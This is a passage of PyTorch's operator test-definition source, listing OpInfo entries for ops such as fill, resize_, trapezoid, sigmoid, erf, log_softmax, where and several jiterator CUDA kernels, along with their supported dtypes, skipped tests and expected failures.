check_batched_forward_grad=False, sample_inputs_func=sample_inputs_squeeze), UnaryUfuncInfo( 'fill', op=_fill_aten, ref=_fill_np, method_variant=None, inplace_variant=torch.Tensor.fill_, sample_kwargs=_fill_sample_kwargs, sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'value': True}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, skips=( # JIT has issue when op is passed as lambda # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("No fill_ op"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("No fill_ op"), 'TestNNCOpInfo'), )), OpInfo('resize_', op=lambda x, shape: x.clone().resize_(shape), method_variant=None, inplace_variant=torch.Tensor.resize_, # the test fails because resize_ doesn't work with imag views as expected by the test # https://github.com/pytorch/pytorch/issues/65945 test_neg_view=False, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, skips=( # Cannot resize variables that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_operator'), ), sample_inputs_func=sample_inputs_resize_ops), OpInfo('resize_as_', op=lambda x, other: torch.resize_as_(x.clone(), other), method_variant=None, inplace_variant=torch.Tensor.resize_as_, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, skips=( # Cannot resize variables that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), ), sample_inputs_func=sample_inputs_resize_ops), OpInfo('take_along_dim', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_take_along_dim, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), ShapeFuncInfo('tile', ref=np.tile, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_repeat_tile), OpInfo('trapz', # TODO: in the future, 'trapz' should be made a proper alias of 'trapezoid' dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_trapezoid), OpInfo('trapezoid', dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_trapezoid), OpInfo('cumulative_trapezoid', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_cumulative_trapezoid,), OpInfo('unsqueeze', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, assert_jit_shape_analysis=True, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused sample_inputs_func=sample_unsqueeze), BinaryUfuncInfo('xlogy', aliases=('special.xlogy',), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, skips=( # nan vs nan comparisons # https://github.com/pytorch/pytorch/issues/74279 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), )), OpInfo('zero_', op=lambda x: torch.zero_(x.clone()), method_variant=None, inplace_variant=torch.Tensor.zero_, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_gradgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), sample_inputs_func=sample_inputs_zero_), BinaryUfuncInfo('special.xlog1py', aten_name='special_xlog1py', dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=all_types_and(torch.bool, torch.bfloat16), backward_dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, skips=( # nan vs 0 comparisons # https://github.com/pytorch/pytorch/issues/74279 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), )), BinaryUfuncInfo('special.zeta', aten_name='special_zeta', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, supports_autograd=False, supports_one_python_scalar=True), # TODO: FIXME # OpInfo entry to verify the gradient formula of `other`/`q` # BinaryUfuncInfo('special.zeta', # op=lambda q, x, **kwargs: torch.special.zeta(x, q, **kwargs), # aten_name='special_zeta', # variant_test_name='grad', # dtypes=all_types_and(torch.bool), # promotes_int_to_float=True, # supports_autograd=True, # supports_rhs_python_scalar=False, # decorators=[ # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable") # ], # skips=( # # Lambda doesn't work in JIT test # # AssertionError: JIT Test does not execute any logic # DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit"), # )), OpInfo('logsumexp', aliases=('special.logsumexp',), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.half), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_logsumexp), OpInfo('trace', dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_inplace_autograd=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_trace), OpInfo('transpose', ref=_numpy_ref_transpose, aliases=('swapdims', 'swapaxes'), assert_jit_shape_analysis=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_transpose_swapdims), OpInfo('T', op=lambda x: x.T, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_T), OpInfo('H', op=lambda x: x.H, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_T), OpInfo('mT', op=lambda x: x.mT, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_adjoint), OpInfo('mH', op=lambda x: x.mH, aliases=('adjoint',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_adjoint), OpInfo('tril', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tril_triu), OpInfo('triu', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tril_triu), OpInfo('kron', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_kron), OpInfo('inner', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_inner, ), OpInfo('tensordot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tensordot, skips=( # Skip operator schema test because this is a functional and not an operator. # Reference: https://github.com/pytorch/pytorch/issues/54574 DecorateInfo(unittest.skip("Skipped!"), 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ) ), OpInfo('to_sparse', op=lambda x, *args: x.to_sparse(*args), sample_inputs_func=sample_inputs_to_sparse, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), backward_dtypes=floating_types(), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_sparse_csr=True, check_batched_grad=False, check_batched_gradgrad=False, skips=( # to_sparse does not support automatic differentiation for outputs with complex dtype DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_nondifferentiable', dtypes=(torch.cdouble,)), # NotImplementedError: Could not run 'aten::normal_' with arguments from the 'SparseCPU' backend DecorateInfo(unittest.skip(""), 'TestCommon', 'test_noncontiguous_samples'), # TODO: FIXME: complex inputs requiring grad error in forward DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Allowed exception: sparse tensors don't have strides DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_backward'), # TODO: implement csr.to_sparse(sample_dim) where sampled_dim is 1. DecorateInfo(unittest.skip("csr.to_sparse(1) not implemented. Skipped!"), 'TestSparseCSR', 'test_sparse_csr_consistency'), ) ), OpInfo('logcumsumexp', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), backward_dtypes=floating_types_and(torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.bfloat16), skips=( # AssertionError: UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning', device_type='cuda'), ), sample_inputs_func=sample_inputs_logcumsumexp, error_inputs_func=error_inputs_logcumsumexp), UnaryUfuncInfo('sigmoid', aliases=('special.expit', 'nn.functional.sigmoid'), aten_backward_name='sigmoid_backward', ref=reference_sigmoid if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.float16: 1e-2, torch.complex64: 1e-1, torch.bfloat16: 1e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/56012 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.complex64, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.chalf, torch.complex64, torch.cdouble]), # alias, nn.functional.sigmoid, will produce (because of warning string saved): # "RuntimeError: Expected to not find "sigmoid" but found it" DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping')), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.complex32, torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, # sigmoid(z) = 1 / (1 + exp(-z)), at z = j * pi * odd_number, the denominator is zero reference_numerics_filter=NumericsFilter( condition=lambda x: (close_to_int(x / (math.pi * 1j)) if x.is_complex() else x.new_tensor(False, dtype=torch.bool)), safe_val=0)), UnaryUfuncInfo('digamma', ref=scipy.special.digamma if TEST_SCIPY else _NOTHING, aliases=('special.psi', 'special.digamma',), decorators=(precisionOverride({torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.entr', ref=scipy.special.entr if TEST_SCIPY else _NOTHING, aten_name='special_entr', supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.float16: 1e-1, torch.bfloat16: 1e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16, torch.float16]), ), supports_inplace_autograd=False, sample_inputs_func=sample_inputs_entr), UnaryUfuncInfo('special.ndtri', ref=scipy.special.ndtri if TEST_SCIPY else _NOTHING, domain=(0, 1), aten_name='special_ndtri', dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.log_ndtr', aten_name='special_log_ndtr', ref=scipy.special.log_ndtr if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), UnaryUfuncInfo('erf', ref=scipy.special.erf if TEST_SCIPY else _NOTHING, aliases=('special.erf', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('erfc', ref=scipy.special.erfc if TEST_SCIPY else _NOTHING, aliases=('special.erfc', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('erfinv', ref=scipy.special.erfinv if TEST_SCIPY else _NOTHING, aliases=('special.erfinv', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2, torch.float32: 1e-4}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, domain=(-1, 1), skips=( # Reference: https://github.com/pytorch/pytorch/pull/49155#issuecomment-742664611 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), )), OpInfo("nn.functional.smooth_l1_loss", ref=reference_smooth_l1_loss, sample_inputs_func=sample_inputs_smooth_l1_loss, dtypes=floating_types_and(torch.float16, torch.bfloat16), backward_dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalTypeINTERNAL ASSERT FAILED # at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),)), OpInfo( "nn.functional.l1_loss", ref=loss_reference_reduction_wrapper(lambda input, target: np.abs(input - target)), aten_backward_name='l1_loss_backward', sample_inputs_func=sample_inputs_l1_loss, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), backward_dtypes=all_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalTypeINTERNAL ASSERT FAILED # at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, please report a bug to PyTorch. DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), ), ), UnaryUfuncInfo('lgamma', ref=reference_lgamma if TEST_SCIPY else _NOTHING, aliases=('special.gammaln', ), decorators=(precisionOverride({torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/50140#discussion_r552615345 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), # Reference: https://github.com/pytorch/pytorch/pull/50140#issuecomment-756150214 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.float32, torch.float64], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.float32, torch.float64], active_if=IS_WINDOWS), ), # lgamma have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), OpInfo( 'logdet', dtypes=floating_types(), supports_out=False, sample_inputs_func=sample_inputs_logdet, decorators=(skipCPUIfNoLapack, skipCUDAIfNoMagma)), # `log_softmax` supports different dtypes based on whether `dtype` argument, # is passed or not. Hence two OpInfo entries, one with dtype and other without. OpInfo( 'log_softmax', aliases=('special.log_softmax', 'nn.functional.log_softmax'), supports_out=True, aten_backward_name='_log_softmax_backward_data', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, supports_forward_ad=True, assert_autodiffed=True), OpInfo( 'log_softmax', variant_test_name='dtype', aliases=('special.log_softmax', 'nn.functional.log_softmax'), supports_out=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), supports_forward_ad=True, assert_autodiffed=True), UnaryUfuncInfo('logit', aten_backward_name='logit_backward', ref=scipy.special.logit if TEST_SCIPY else _NOTHING, domain=(0, 1), aliases=('special.logit', ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 5e-1, torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_logit), OpInfo('where', # Currently only the `input` is tested in gradcheck. # If we pass `condition` first, none of the input which supports # autograd will be tested. Hence the following lambda. op=lambda self, condition, other: torch.where(condition, self, other), ref=lambda self, condition, other: np.where(condition, self, other), sample_inputs_func=sample_inputs_where, reference_inputs_func=reference_inputs_where, error_inputs_func=error_inputs_where, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( DecorateInfo(onlyCUDA, "TestCommon", 'test_errors'),), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf)), OpInfo('nonzero', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), sample_inputs_func=sample_inputs_nonzero, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # nonzero(): argument 'out' must be Tensor, not tuple DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # https://github.com/pytorch/pytorch/issues/67458 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # nonzero is not raising a warning when the out is resized DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), # Following tests are for jiterator's python interface # Jiterator can be used to author elementwise CUDA kernel # jiterator._create_jit_fn returns a callable that behaves like a regular pytorch op # See create_jit_fn in jiterator.py for more information UnaryUfuncInfo( 'jiterator_unary', op=torch.cuda.jiterator._create_jit_fn("template <typename T> T unary(T x) { return x * x + x; }"), ref=lambda x: x * x + x, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined decorators=[ onlyCUDA, skipCUDAIfRocm, DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_hard'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_normal'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_small'), ], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Skip reference_numerics tests for bool type, as the defined function doesn't work for bool DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bool]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_hard', dtypes=[torch.bool]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=[torch.bool]), # Expected failure: torch.jiterator_unary is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), BinaryUfuncInfo( 'jiterator_binary', op=torch.cuda.jiterator._create_jit_fn( "template <typename T> T binary(T x, T y, T alpha) { return x + alpha * y; }", alpha=1), ref=lambda input, other, *, alpha=1: np.add(input, other) if alpha == 1 \ else np.add(input, np.multiply(alpha, other)), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2, alpha=-3.14), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined supports_rhs_python_scalar=False, decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_binary is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), OpInfo( 'jiterator_4inputs_with_extra_args', op=torch.cuda.jiterator._create_jit_fn( "template <typename T> T binary(T i0, T i1, T i2, T i3, T alpha, T beta) { return alpha * i0 + beta * i1 + i2 + i3; }", alpha=1, beta=1), ref=lambda i0, i1, i2, i3, *, alpha=1, beta=1: alpha * i0 + beta * i1 + i2 + i3, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=4, alpha=3.14, beta=-4.20), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), BinaryUfuncInfo( 'jiterator_binary_return_by_ref', op=torch.cuda.jiterator._create_multi_output_jit_fn( """ template <typename T> T binary_return_by_ref(T i0, T i1, T& out0) { out0 = i0 + i1; } """, num_outputs=1), ref=lambda i0, i1: i0 + i1, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2, alpha=-0.42), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined supports_rhs_python_scalar=False, decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), OpInfo( 'jiterator_2inputs_2outputs', op=torch.cuda.jiterator._create_multi_output_jit_fn( """ template <typename T> T binary_2outputs(T i0, T i1, T& out0, T& out1) { out0 = i0 + i1; out1 = i0 - i1; } """, num_outputs=2), ref=lambda i0, i1, *, alpha=1: (i0 + i1, i0 - i1), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but 